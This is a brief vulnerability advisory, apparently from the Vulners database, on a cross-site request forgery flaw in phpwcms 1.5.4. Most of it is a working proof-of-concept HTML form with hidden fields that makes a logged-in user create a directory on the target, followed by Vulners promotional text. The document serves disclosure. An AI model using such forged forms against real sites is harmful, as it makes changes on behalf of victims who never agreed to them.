`# Affected software: phpwcms
# Type of vulnerability:csrf
# URL:http://www.opensourcecms.com/demo/2/54/phpwcms
# Discovered by: provensec
# Website: provensec.com
#version:1.5.4
# Proof of concept
no csrf protections were used on directory creation page
<html>
<body>
<form action="
http://demo.opensourcecms.com/phpwcms/phpwcms.php?do=files&f=0"
method="POST">
<input type="hidden" name="dir_newname" value="fff" />
<input type="hidden" name="dir_longinfo" value="fff" />
<input type="hidden" name="dir_gallery" value="0" />
<input type="hidden" name="dir_sort" value="0" />
<input type="hidden" name="dir_aktiv" value="1" />
<input type="hidden" name="dir_pid" value="0" />
<input type="hidden" name="dir_aktion" value="1" />
<input type="hidden" name="Submit" value="create new dir" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation